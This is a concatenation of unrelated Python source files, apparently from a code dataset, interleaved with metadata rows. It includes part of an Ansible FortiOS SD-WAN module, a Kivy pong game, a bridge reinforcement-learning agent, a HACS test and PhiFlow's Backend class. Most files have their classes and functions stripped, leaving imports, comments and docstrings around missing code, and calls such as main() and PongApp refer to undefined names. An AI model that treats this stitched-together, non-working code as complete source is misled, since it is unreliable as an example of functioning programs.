name: "default_name_84 (source firewall.internet-service-group.name)"
internet_service_id:
-
id: "86 (source firewall.internet-service.id)"
jitter_weight: "87"
latency_weight: "88"
link_cost_factor: "latency"
link_cost_threshold: "90"
member: "91"
mode: "auto"
name: "default_name_93"
packet_loss_weight: "94"
priority_members:
-
seq_num: "96 (source system.virtual-wan-link.members.seq-num)"
protocol: "97"
quality_link: "98"
route_tag: "99"
sla:
-
health_check: "<your_own_value> (source system.virtual-wan-link.health-check.name)"
id: "102"
src:
-
name: "default_name_104 (source firewall.address.name firewall.addrgrp.name)"
src_negate: "enable"
src6:
-
name: "default_name_107 (source firewall.address6.name firewall.addrgrp6.name)"
start_port: "108"
status: "enable"
tos: "<your_own_value>"
tos_mask: "<your_own_value>"
users:
-
name: "default_name_113 (source user.local.name)"
status: "disable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
if __name__ == '__main__':
main()
| 45.823781 | 158 | 0.396823 |
6a3d5a0b8814fbb4a8dcce839502382dcb8efe0a
| 1,120 |
py
|
Python
|
src/Puerta.py
|
victorlujan/Dise-odeSoftwarePatrones
|
b9845cc1c4abdc44867c90b9e9784246e57f16b3
|
[
"MIT"
] | null | null | null |
src/Puerta.py
|
victorlujan/Dise-odeSoftwarePatrones
|
b9845cc1c4abdc44867c90b9e9784246e57f16b3
|
[
"MIT"
] | null | null | null |
src/Puerta.py
|
victorlujan/Dise-odeSoftwarePatrones
|
b9845cc1c4abdc44867c90b9e9784246e57f16b3
|
[
"MIT"
] | null | null | null |
from ElementoMapa import ElementoMapa
| 24.347826 | 101 | 0.583036 |
6a3f937a42b26dd8a8d5325705ad3a6b2426f5e8
| 2,421 |
py
|
Python
|
pong.py
|
Teenahshe/ponggame
|
5e4032753894ce1e1ebeb51841676aac24aa22df
|
[
"MIT"
] | null | null | null |
pong.py
|
Teenahshe/ponggame
|
5e4032753894ce1e1ebeb51841676aac24aa22df
|
[
"MIT"
] | null | null | null |
pong.py
|
Teenahshe/ponggame
|
5e4032753894ce1e1ebeb51841676aac24aa22df
|
[
"MIT"
] | null | null | null |
"""
# Step 1 - Create the App
# Step 2 - Create the Game
# Step 3 - Build the Game
# Step 4 - Run the App
"""
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.properties import NumericProperty, ReferenceListProperty, ObjectProperty
from kivy.vector import Vector
from kivy.clock import Clock
from random import randint
# Update - moving the ball by calling the move function and other stuff
# on touch_down() = When our fingers/mouse touches he screen
# on touch_up() - when we lift our finger off the screen after touching it
# on_touch_move() - when we drag our finger on the screen
PongApp().run()
| 28.482353 | 83 | 0.620818 |
6a3fb6dff04d4cee8ea3de55fdb86c079b4a97dc
| 18,713 |
py
|
Python
|
bridge_RL_agent_v16.py
|
EricZLou/BridgeRLAgent
|
78329eec5fcf320d2850f44dc33b138919fba82d
|
[
"MIT"
] | null | null | null |
bridge_RL_agent_v16.py
|
EricZLou/BridgeRLAgent
|
78329eec5fcf320d2850f44dc33b138919fba82d
|
[
"MIT"
] | null | null | null |
bridge_RL_agent_v16.py
|
EricZLou/BridgeRLAgent
|
78329eec5fcf320d2850f44dc33b138919fba82d
|
[
"MIT"
] | null | null | null |
"""
CS 238 Final Project: Bridge RL Agent
Eric Lou & Kimberly Tran
"""
import copy
import datetime
import numpy as np
import random
from collections import namedtuple
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
REPRESENTATIONS OF BRIDGE
Representing a "Card" as an integer:
Cards 0 -> 12 are Club 2 -> Club 14
Cards 13 -> 25 are Diamond 2 -> Diamond 14
Cards 26 -> 38 are Heart 2 -> Heart 14
Cards 39 -> 51 are Spade 2 -> Spade 14
Jack is 11
Queen is 12
King is 13
Ace is 14
Representing a "Suit" as an integer:
n/a is -1 <-- used in a "State" where no cards have been played yet.
Clubs is 0
Diamonds is 1
Hearts is 2
Spades is 3
Representing a "State" as an opening suit and frozenset of up to 3 "Card"-s:
state = State(1, frozenset(23, 0))
We have a Diamond 12 and Club 2 with an opening suit of Diamonds.
The agent is 3rd to play a card and must play a Diamond if it has one.
Representing the MDP with a Map from a "State" to an array of length-52:
We call this Map "weights". And the array of length-52 represets the
proportion with which the agent should play each of the 52 cards given
that it is at that state.
In this example, with state = (1, set(23, 0)), weights[state] will
likely have very large values at indices 24 and 25 since a
Diamond 13 and Diamond 14 will beat the Diamond 12.
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
State = namedtuple('State', ['opening_suit', 'cards_played', 'partners_card'])
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
"
" DEFINE SOME CONSTANTS
"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
NUM_ACTIONS = 52 # Agent can choose any card to play (only some are valid).
NUM_GAMES_TRAIN = 10000
NUM_GAMES_TEST = 10000
STATS_PER = 1000
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
"
" RL AGENT
"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
"
" UTILITY FUNCTIONS
"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
"""
This functions deals random cards.
"""
deck = list(range(52))
"""
This function is used by non-agents who play randomly.
"""
"""
This function determines the winner of the round.
"""
"""
This function determines the declarer based on partnership with the most points.
Return: (agent_is_declarer, declarer_idx)
"""
"""
This function counts the points in each hand.
Note: Ace is 12, 25, 38, 51
"""
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
"
" TRACKS PERFORMANCE OF BRIDGE AGENT
"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
"
" PLAY A SINGLE GAME OF BRIDGE
"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
"""
This function plays 13 rounds of 1 NT bridge and outputs a winner.
"""
if __name__ == "__main__":
main()
| 37.880567 | 141 | 0.579276 |
6a40e4db387ff19b81d94d3c6d3164793744fc01
| 1,411 |
py
|
Python
|
tests/hacsbase/test_hacsbase_data.py
|
chbonkie/hacs
|
81db513a0d3d1af1acf25da7b706ae62d8fdb6fa
|
[
"MIT"
] | 2 |
2019-06-18T11:30:53.000Z
|
2019-10-03T21:34:11.000Z
|
tests/hacsbase/test_hacsbase_data.py
|
chbonkie/hacs
|
81db513a0d3d1af1acf25da7b706ae62d8fdb6fa
|
[
"MIT"
] | 341 |
2019-06-18T11:30:55.000Z
|
2021-07-15T05:38:46.000Z
|
tests/hacsbase/test_hacsbase_data.py
|
chbonkie/hacs
|
81db513a0d3d1af1acf25da7b706ae62d8fdb6fa
|
[
"MIT"
] | null | null | null |
"""Data Test Suite."""
from aiogithubapi.objects import repository
import pytest
import os
from homeassistant.core import HomeAssistant
from custom_components.hacs.hacsbase.data import HacsData
from custom_components.hacs.helpers.classes.repository import HacsRepository
from custom_components.hacs.hacsbase.configuration import Configuration
from custom_components.hacs.share import get_hacs
from tests.dummy_repository import dummy_repository_base
| 30.021277 | 76 | 0.763997 |
6a415615b9b2bc4e4bdf10ab3d417314a169e277
| 44,836 |
py
|
Python
|
phi/math/backend/_backend.py
|
marc-gav/PhiFlow
|
b6186fd1503d040997b52d49aa18cd875267c27e
|
[
"MIT"
] | null | null | null |
phi/math/backend/_backend.py
|
marc-gav/PhiFlow
|
b6186fd1503d040997b52d49aa18cd875267c27e
|
[
"MIT"
] | null | null | null |
phi/math/backend/_backend.py
|
marc-gav/PhiFlow
|
b6186fd1503d040997b52d49aa18cd875267c27e
|
[
"MIT"
] | null | null | null |
from collections import namedtuple
from contextlib import contextmanager
from threading import Barrier
from typing import List, Callable
import numpy
from ._dtype import DType, combine_types
SolveResult = namedtuple('SolveResult', [
'method', 'x', 'residual', 'iterations', 'function_evaluations', 'converged', 'diverged', 'message',
])
def auto_cast(self, *tensors) -> list:
"""
Determins the appropriate values type resulting from operations involving the tensors as input.
This method is called by the default implementations of basic operators.
Backends can override this method to prevent unnecessary casting.
Args:
*tensors: tensors to cast and to consider when determining the common data type
Returns:
tensors cast to a common data type
"""
dtypes = [self.dtype(t) for t in tensors]
result_type = self.combine_types(*dtypes)
if result_type.kind in (int, float, complex, bool):
tensors = [self.cast(t, result_type) for t in tensors]
return tensors
def __str__(self):
return self.name
def __repr__(self):
return self.name
def list_devices(self, device_type: str or None = None) -> List[ComputeDevice]:
"""
Fetches information about all available compute devices this backend can use.
Implementations:
* NumPy: [`os.cpu_count`](https://docs.python.org/3/library/os.html#os.cpu_count)
* PyTorch: [`torch.cuda.get_device_properties`](https://pytorch.org/docs/stable/cuda.html#torch.cuda.get_device_properties)
* TensorFlow: `tensorflow.python.client.device_lib.list_local_devices`
* Jax: [`jax.devices`](https://jax.readthedocs.io/en/latest/jax.html#jax.devices)
Args:
device_type: (optional) Return only devices of this type, e.g. `'GPU'` or `'CPU'`. See `ComputeDevice.device_type`.
Returns:
`list` of all currently available devices.
"""
raise NotImplementedError()
def get_default_device(self) -> ComputeDevice:
return self._default_device
def set_default_device(self, device: ComputeDevice or str):
if isinstance(device, str):
devices = self.list_devices(device)
assert len(devices) >= 1, f"{self.name}: Cannot select '{device} because no device of this type is available."
device = devices[0]
self._default_device = device
def seed(self, seed: int):
raise NotImplementedError()
def is_tensor(self, x, only_native=False):
"""
An object is considered a native tensor by a backend if no internal conversion is required by backend methods.
An object is considered a tensor (nativer or otherwise) by a backend if it is not a struct (e.g. tuple, list) and all methods of the backend accept it as a tensor argument.
Args:
x: object to check
only_native: If True, only accepts true native tensor representations, not Python numbers or others that are also supported as tensors (Default value = False)
Returns:
bool: whether `x` is considered a tensor by this backend
"""
raise NotImplementedError()
def as_tensor(self, x, convert_external=True):
"""
Converts a tensor-like object to the native tensor representation of this backend.
If x is a native tensor of this backend, it is returned without modification.
If x is a Python number (numbers.Number instance), `convert_numbers` decides whether to convert it unless the backend cannot handle Python numbers.
*Note:* There may be objects that are considered tensors by this backend but are not native and thus, will be converted by this method.
Args:
x: tensor-like, e.g. list, tuple, Python number, tensor
convert_external: if False and `x` is a Python number that is understood by this backend, this method returns the number as-is. This can help prevent type clashes like int32 vs int64. (Default value = True)
Returns:
tensor representation of `x`
"""
raise NotImplementedError()
def is_available(self, tensor) -> bool:
"""
Tests if the value of the tensor is known and can be read at this point.
If true, `numpy(tensor)` must return a valid NumPy representation of the value.
Tensors are typically available when the backend operates in eager mode.
Args:
tensor: backend-compatible tensor
Returns:
bool
"""
raise NotImplementedError()
def numpy(self, tensor) -> numpy.ndarray:
"""
Returns a NumPy representation of the given tensor.
If `tensor` is already a NumPy array, it is returned without modification.
This method raises an error if the value of the tensor is not known at this point, e.g. because it represents a node in a graph.
Use `is_available(tensor)` to check if the value can be represented as a NumPy array.
Args:
tensor: backend-compatible tensor
Returns:
NumPy representation of the values stored in the tensor
"""
raise NotImplementedError()
def to_dlpack(self, tensor):
raise NotImplementedError()
def from_dlpack(self, capsule):
raise NotImplementedError()
def copy(self, tensor, only_mutable=False):
raise NotImplementedError()
def call(self, f: Callable, *args, name=None):
"""
Calls `f(*args)` and returns the result.
This method may be used to register internal calls with the profiler.
Usage:
choose_backend(key).call(custom_function, *args)
"""
return f(*args)
def block_until_ready(self, values):
pass
def jit_compile(self, f: Callable) -> Callable:
return NotImplemented
def functional_gradient(self, f, wrt: tuple or list, get_output: bool):
raise NotImplementedError(self)
def custom_gradient(self, f: Callable, gradient: Callable) -> Callable:
"""
Creates a function based on `f` that uses a custom gradient for backprop.
Args:
f: Forward function.
gradient: Function for backprop. Will be called as `gradient(*d_out)` to compute the gradient of `f`.
Returns:
Function with similar signature and return values as `f`. However, the returned function does not support keyword arguments.
"""
return NotImplemented
def jit_compile_grad(self, f, wrt: tuple or list, get_output: bool):
raise NotImplementedError()
def transpose(self, tensor, axes):
raise NotImplementedError()
def random_uniform(self, shape):
""" Float tensor of selected precision containing random values in the range [0, 1) """
raise NotImplementedError(self)
def random_normal(self, shape):
""" Float tensor of selected precision containing random values sampled from a normal distribution with mean 0 and std 1. """
raise NotImplementedError(self)
def stack(self, values, axis=0):
raise NotImplementedError(self)
def concat(self, values, axis):
raise NotImplementedError(self)
def pad(self, value, pad_width, mode: str = 'constant', constant_values=0):
"""
Pad a tensor with values as specified by `mode` and `constant_values`.
If the mode is not supported, returns NotImplemented.
Args:
value: tensor
pad_width: 2D tensor specifying the number of values padded to the edges of each axis in the form [[axis 0 lower, axis 0 upper], ...] including batch and component axes.
mode: constant', 'boundary', 'periodic', 'symmetric', 'reflect'
constant_values: used for out-of-bounds points if mode='constant' (Default value = 0)
mode: str: (Default value = 'constant')
Returns:
padded tensor or NotImplemented
"""
raise NotImplementedError(self)
def reshape(self, value, shape):
raise NotImplementedError(self)
def flip(self, value, axes: tuple or list):
slices = tuple(slice(None, None, -1 if i in axes else None) for i in range(self.ndims(value)))
return value[slices]
def sum(self, value, axis=None, keepdims=False):
raise NotImplementedError(self)
def prod(self, value, axis=None):
raise NotImplementedError(self)
def divide_no_nan(self, x, y):
"""
Computes x/y but returns 0 if y=0.
Args:
x:
y:
Returns:
"""
raise NotImplementedError(self)
def where(self, condition, x=None, y=None):
raise NotImplementedError(self)
def nonzero(self, values):
"""
Args:
values: Tensor with only spatial dimensions
Returns:
non-zero multi-indices as tensor of shape (nnz, vector)
"""
raise NotImplementedError(self)
def mean(self, value, axis=None, keepdims=False):
raise NotImplementedError(self)
def range(self, start, limit=None, delta=1, dtype: DType = DType(int, 32)):
raise NotImplementedError(self)
def zeros(self, shape, dtype: DType = None):
raise NotImplementedError(self)
def zeros_like(self, tensor):
raise NotImplementedError(self)
def ones(self, shape, dtype: DType = None):
raise NotImplementedError(self)
def ones_like(self, tensor):
raise NotImplementedError(self)
def meshgrid(self, *coordinates):
raise NotImplementedError(self)
def linspace(self, start, stop, number):
raise NotImplementedError(self)
def tensordot(self, a, a_axes: tuple or list, b, b_axes: tuple or list):
""" Multiply-sum-reduce a_axes of a with b_axes of b. """
raise NotImplementedError(self)
def matmul(self, A, b):
raise NotImplementedError(self)
def einsum(self, equation, *tensors):
raise NotImplementedError(self)
def while_loop(self, loop: Callable, values: tuple):
"""
```python
while any(values[0]):
values = loop(*values)
return values
```
This operation does not support backpropagation.
Args:
loop: Loop function, must return a `tuple` with entries equal to `values` in shape and data type.
values: Initial values of loop variables.
Returns:
Loop variables upon loop completion.
"""
raise NotImplementedError(self)
def abs(self, x):
raise NotImplementedError(self)
def sign(self, x):
raise NotImplementedError(self)
def round(self, x):
raise NotImplementedError(self)
def ceil(self, x):
raise NotImplementedError(self)
def floor(self, x):
raise NotImplementedError(self)
def max(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def min(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def maximum(self, a, b):
raise NotImplementedError(self)
def minimum(self, a, b):
raise NotImplementedError(self)
def clip(self, x, minimum, maximum):
raise NotImplementedError(self)
def sqrt(self, x):
raise NotImplementedError(self)
def exp(self, x):
raise NotImplementedError(self)
def conv(self, value, kernel, zero_padding=True):
"""
Convolve value with kernel.
Depending on the tensor rank, the convolution is either 1D (rank=3), 2D (rank=4) or 3D (rank=5).
Higher dimensions may not be supported.
Args:
value: tensor of shape (batch_size, in_channel, spatial...)
kernel: tensor of shape (batch_size or 1, out_channel, in_channel, spatial...)
zero_padding: If True, pads the edges of `value` with zeros so that the result has the same shape as `value`.
Returns:
Convolution result as tensor of shape (batch_size, out_channel, spatial...)
"""
raise NotImplementedError(self)
def expand_dims(self, a, axis=0, number=1):
raise NotImplementedError(self)
def shape(self, tensor):
raise NotImplementedError(self)
def staticshape(self, tensor):
raise NotImplementedError(self)
def cast(self, x, dtype: DType):
raise NotImplementedError(self)
def to_float(self, x):
"""
Converts a tensor to floating point values with precision equal to the currently set default precision.
See Also:
`Backend.precision()`.
If `x` is mutable and of the correct floating type, returns a copy of `x`.
To convert float tensors to the backend precision but leave non-float tensors untouched, use `Backend.as_tensor()`.
Args:
x: tensor of bool, int or float
Returns:
Values of `x` as float tensor
"""
return self.cast(x, self.float_type)
def to_int32(self, x):
return self.cast(x, DType(int, 32))
def to_int64(self, x):
return self.cast(x, DType(int, 64))
def to_complex(self, x):
return self.cast(x, DType(complex, max(64, min(self.precision * 2, 128))))
def batched_gather_nd(self, values, indices):
"""
Gathers values from the tensor `values` at locations `indices`.
The first dimension of `values` and `indices` is the batch dimension which must be either equal for both or one for either.
Args:
values: tensor of shape (batch, spatial..., channel)
indices: int tensor of shape (batch, any..., multi_index) where the size of multi_index is values.rank - 2.
Returns:
Gathered values as tensor of shape (batch, any..., channel)
"""
raise NotImplementedError(self)
def flatten(self, x):
return self.reshape(x, (-1,))
def std(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def boolean_mask(self, x, mask, axis=0):
"""
Args:
x: tensor with any number of dimensions
mask: 1D mask tensor
axis: Axis index >= 0
"""
raise NotImplementedError(self)
def isfinite(self, x):
raise NotImplementedError(self)
def scatter(self, base_grid, indices, values, mode: str):
"""
Depending on `mode`, performs scatter_update or scatter_add.
Args:
base_grid: Tensor into which scatter values are inserted at indices. Tensor of shape (batch_size, spatial..., channels)
indices: Tensor of shape (batch_size or 1, update_count, index_vector)
values: Values to scatter at indices. Tensor of shape (batch_size or 1, update_count or 1, channels or 1)
mode: One of ('update', 'add')
Returns:
Copy of base_grid with values at `indices` updated by `values`.
"""
raise NotImplementedError(self)
def any(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError(self)
def all(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError(self)
def fft(self, x):
"""
Computes the n-dimensional FFT along all but the first and last dimensions.
Args:
x: tensor of dimension 3 or higher
Returns:
"""
raise NotImplementedError(self)
def ifft(self, k):
"""
Computes the n-dimensional inverse FFT along all but the first and last dimensions.
Args:
k: tensor of dimension 3 or higher
Returns:
"""
raise NotImplementedError(self)
def imag(self, x):
raise NotImplementedError(self)
def real(self, x):
raise NotImplementedError(self)
def sin(self, x):
raise NotImplementedError(self)
def cos(self, x):
raise NotImplementedError(self)
def tan(self, x):
raise NotImplementedError(self)
def log(self, x):
""" Natural logarithm """
raise NotImplementedError(self)
def log2(self, x):
raise NotImplementedError(self)
def log10(self, x):
raise NotImplementedError(self)
def dtype(self, array) -> DType:
raise NotImplementedError(self)
def tile(self, value, multiples):
"""
Repeats the tensor along each axis the number of times given by multiples.
If `multiples` has more dimensions than `value`, these dimensions are added to `value` as outer dimensions.
Args:
value: tensor
multiples: tuple or list of integers
Returns:
tile tensor
"""
raise NotImplementedError(self)
def sparse_tensor(self, indices, values, shape):
"""
Optional features.
Args:
indices: tuple/list matching the dimensions (pair for matrix)
values: param shape:
shape:
Returns:
"""
raise NotImplementedError(self)
def coordinates(self, tensor):
"""
Returns the coordinates and values of a tensor.
Args:
tensor: Sparse tensor
Returns:
coordinates: `tuple` of tensor holding the coordinate vectors, i.e. (row, col) for matrices.
indices: Tensor holding the corresponding values
"""
raise NotImplementedError(self)
def minimize(self, method: str, f, x0, atol, max_iter, trj: bool):
from scipy.optimize import OptimizeResult, minimize
from threading import Thread
assert self.supports(Backend.functional_gradient)
assert len(self.staticshape(x0)) == 2 # (batch, parameters)
batch_size = self.staticshape(x0)[0]
fg = self.functional_gradient(f, [0], get_output=True)
method_description = f"SciPy {method} with {self.name}"
iterations = [0] * batch_size
function_evaluations = [0] * batch_size
xs = [None] * batch_size
final_losses = [None] * batch_size
converged = [False] * batch_size
diverged = [False] * batch_size
messages = [""] * batch_size
f_inputs = [None] * batch_size
f_b_losses = None
f_b_losses_np = None
f_grad_np = None
f_input_available = Barrier(batch_size + 1)
f_output_available = Barrier(batch_size + 1)
finished = [False] * batch_size
all_finished = False
trajectories = [[] for _ in range(batch_size)] if trj else None
threads = []
for b in range(batch_size):
b_thread = Thread(target=b_thread)
threads.append(b_thread)
b_thread.start()
while True:
f_input_available.wait()
if all(finished):
all_finished = True
f_output_available.wait()
break
_, f_b_losses, f_grad = fg(self.stack(f_inputs))
f_b_losses_np = self.numpy(f_b_losses).astype(numpy.float64)
f_grad_np = self.numpy(f_grad).astype(numpy.float64)
f_output_available.wait()
for b_thread in threads:
b_thread.join() # make sure threads exit correctly
if trj:
max_trajectory_length = max([len(t) for t in trajectories])
last_points = [SolveResult(method_description, xs[b], final_losses[b], iterations[b], function_evaluations[b], converged[b], diverged[b], "") for b in range(batch_size)]
trajectories = [t[:-1] + [last_point] * (max_trajectory_length - len(t) + 1) for t, last_point in zip(trajectories, last_points)]
trajectory = []
for states in zip(*trajectories):
x = self.stack([self.to_float(state.x) for state in states])
residual = self.stack([state.residual for state in states])
iterations = [state.iterations for state in states]
function_evaluations = [state.function_evaluations for state in states]
converged = [state.converged for state in states]
diverged = [state.diverged for state in states]
trajectory.append(SolveResult(method_description, x, residual, iterations, function_evaluations, converged, diverged, messages))
return trajectory
else:
x = self.stack(xs)
residual = self.stack(final_losses)
return SolveResult(method_description, x, residual, iterations, function_evaluations, converged, diverged, messages)
def linear_solve(self, method: str, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
"""
Solve the system of linear equations A x = y.
This method need not provide a gradient for the operation.
Args:
method: Which algorithm to use. One of `('auto', 'CG', 'CG-adaptive')`.
lin: Linear operation. One of
* sparse/dense matrix valid for all instances
* tuple/list of sparse/dense matrices for varying matrices along batch, must have the same nonzero locations.
* linear function A(x), must be called on all instances in parallel
y: target result of A * x. 2nd order tensor (batch, vector) or list of vectors.
x0: Initial guess of size (batch, parameters)
rtol: Relative tolerance of size (batch,)
atol: Absolute tolerance of size (batch,)
max_iter: Maximum number of iterations of size (batch,)
trj: Whether to record and return the optimization trajectory as a `List[SolveResult]`.
Returns:
result: `SolveResult` or `List[SolveResult]`, depending on `trj`.
"""
if method == 'auto':
return self.conjugate_gradient_adaptive(lin, y, x0, rtol, atol, max_iter, trj)
elif method == 'CG':
return self.conjugate_gradient(lin, y, x0, rtol, atol, max_iter, trj)
elif method == 'CG-adaptive':
return self.conjugate_gradient_adaptive(lin, y, x0, rtol, atol, max_iter, trj)
else:
raise NotImplementedError(f"Method '{method}' not supported for linear solve.")
def conjugate_gradient(self, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
""" Standard conjugate gradient algorithm. Signature matches to `Backend.linear_solve()`. """
# Based on "An Introduction to the Conjugate Gradient Method Without the Agonizing Pain" by Jonathan Richard Shewchuk
# symbols: dx=d, dy=q, step_size=alpha, residual_squared=delta, residual=r, y=b
method = f"-Flow CG ({self.name})"
y = self.to_float(y)
x0 = self.copy(self.to_float(x0), only_mutable=True)
batch_size = self.staticshape(y)[0]
tolerance_sq = self.maximum(rtol ** 2 * self.sum(y ** 2, -1), atol ** 2)
x = x0
dx = residual = y - self.linear(lin, x)
it_counter = 0
iterations = self.zeros([batch_size], DType(int, 32))
function_evaluations = self.ones([batch_size], DType(int, 32))
residual_squared = rsq0 = self.sum(residual ** 2, -1, keepdims=True)
diverged = self.any(~self.isfinite(x), axis=(1,))
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
trajectory = [SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")] if trj else None
finished = converged | diverged | (iterations >= max_iter); not_finished_1 = self.to_int32(~finished) # ; active = self.to_float(self.expand_dims(not_finished_1, -1))
while ~self.all(finished):
it_counter += 1; iterations += not_finished_1
dy = self.linear(lin, dx); function_evaluations += not_finished_1
dx_dy = self.sum(dx * dy, axis=-1, keepdims=True)
step_size = self.divide_no_nan(residual_squared, dx_dy)
step_size *= self.expand_dims(self.to_float(not_finished_1), -1) # this is not really necessary but ensures batch-independence
x += step_size * dx
if it_counter % 50 == 0:
residual = y - self.linear(lin, x); function_evaluations += 1
else:
residual = residual - step_size * dy # in-place subtraction affects convergence
residual_squared_old = residual_squared
residual_squared = self.sum(residual ** 2, -1, keepdims=True)
dx = residual + self.divide_no_nan(residual_squared, residual_squared_old) * dx
diverged = self.any(residual_squared / rsq0 > 100, axis=(1,)) & (iterations >= 8)
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
if trajectory is not None:
trajectory.append(SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, ""))
x = self.copy(x)
iterations = self.copy(iterations)
finished = converged | diverged | (iterations >= max_iter); not_finished_1 = self.to_int32(~finished) # ; active = self.to_float(self.expand_dims(not_finished_1, -1))
return trajectory if trj else SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")
def conjugate_gradient_adaptive(self, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
""" Conjugate gradient algorithm with adaptive step size. Signature matches to `Backend.linear_solve()`. """
# Based on the variant described in "Methods of Conjugate Gradients for Solving Linear Systems" by Magnus R. Hestenes and Eduard Stiefel
# https://nvlpubs.nist.gov/nistpubs/jres/049/jresv49n6p409_A1b.pdf
method = f"-Flow CG-adaptive ({self.name})"
y = self.to_float(y)
x0 = self.copy(self.to_float(x0), only_mutable=True)
batch_size = self.staticshape(y)[0]
tolerance_sq = self.maximum(rtol ** 2 * self.sum(y ** 2, -1), atol ** 2)
x = x0
dx = residual = y - self.linear(lin, x)
dy = self.linear(lin, dx)
iterations = self.zeros([batch_size], DType(int, 32))
function_evaluations = self.ones([batch_size], DType(int, 32))
residual_squared = rsq0 = self.sum(residual ** 2, -1, keepdims=True)
diverged = self.any(~self.isfinite(x), axis=(1,))
converged = self.all(residual_squared <= tolerance_sq, axis=(1,))
trajectory = [SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")] if trj else None
continue_ = ~converged & ~diverged & (iterations < max_iter)
_, _, x, _, _, residual, iterations, function_evaluations, converged, diverged =\
self.while_loop(loop, (continue_, 0, x, dx, dy, residual, iterations, function_evaluations, converged, diverged))
return trajectory if trj else SolveResult(method, x, residual, iterations, function_evaluations, converged, diverged, "")
def linear(self, lin, vector):
if callable(lin):
return lin(vector)
elif isinstance(lin, (tuple, list)):
for lin_i in lin:
lin_shape = self.staticshape(lin_i)
assert len(lin_shape) == 2
return self.stack([self.matmul(m, v) for m, v in zip(lin, self.unstack(vector))])
else:
lin_shape = self.staticshape(lin)
assert len(lin_shape) == 2, f"A must be a matrix but got shape {lin_shape}"
return self.matmul(lin, vector)
def gradients(self, y, xs: tuple or list, grad_y) -> tuple:
raise NotImplementedError(self)
def record_gradients(self, xs: tuple or list, persistent=False):
raise NotImplementedError(self)
def stop_gradient(self, value):
raise NotImplementedError(self)
def grid_sample(self, grid, spatial_dims: tuple, coordinates, extrapolation='constant'):
"""
Interpolates a regular grid at the specified coordinates.
Args:
grid: Tensor
spatial_dims: Dimension indices that correspond to coordinate vectors
coordinates: Tensor of floating grid indices.
The last dimension must match `spatial_dims`.
The first grid point of dimension i lies at position 0, the last at values.shape[i]-1.
extrapolation: Values to use for coordinates outside the grid.
One of `('undefined', 'zeros', 'boundary', 'periodic', 'symmetric', 'reflect')`.
Returns:
sampled values with linear interpolation
"""
return NotImplemented
def variable(self, value):
return NotImplemented
def ndims(self, tensor):
return len(self.staticshape(tensor))
def size(self, array):
return self.prod(self.shape(array))
def batch_gather(self, tensor, batches):
if isinstance(batches, int):
batches = [batches]
return tensor[batches, ...]
def unstack(self, tensor, axis=0, keepdims=False) -> tuple:
if axis < 0:
axis += len(tensor.shape)
if axis >= len(tensor.shape) or axis < 0:
raise ValueError("Illegal axis value")
result = []
for slice_idx in range(tensor.shape[axis]):
if keepdims:
component = tensor[tuple([slice(slice_idx, slice_idx + 1) if d == axis else slice(None) for d in range(len(tensor.shape))])]
else:
component = tensor[tuple([slice_idx if d == axis else slice(None) for d in range(len(tensor.shape))])]
result.append(component)
return tuple(result)
def equal(self, x, y):
""" Element-wise equality check """
raise NotImplementedError(self)
def not_equal(self, x, y):
return ~self.equal(x, y)
def greater_than(self, x, y):
x, y = self.auto_cast(x, y)
return x > y
def greater_or_equal(self, x, y):
x, y = self.auto_cast(x, y)
return x >= y
def add(self, a, b):
a, b = self.auto_cast(a, b)
return a + b
def sub(self, a, b):
a, b = self.auto_cast(a, b)
return a - b
def mul(self, a, b):
a, b = self.auto_cast(a, b)
return a * b
def div(self, numerator, denominator):
numerator, denominator = self.auto_cast(numerator, denominator)
return numerator / denominator
def pow(self, base, exp):
base, exp = self.auto_cast(base, exp)
return base ** exp
def mod(self, dividend, divisor):
dividend, divisor = self.auto_cast(dividend, divisor)
return dividend % divisor
def and_(self, a, b):
a, b = self.auto_cast(a, b)
return a & b
def or_(self, a, b):
a, b = self.auto_cast(a, b)
return a | b
def xor(self, a, b):
a, b = self.auto_cast(a, b)
return a ^ b
def floordiv(self, a, b):
a, b = self.auto_cast(a, b)
return a // b
BACKENDS = []
""" Global list of all registered backends. Register a `Backend` by adding it to the list. """
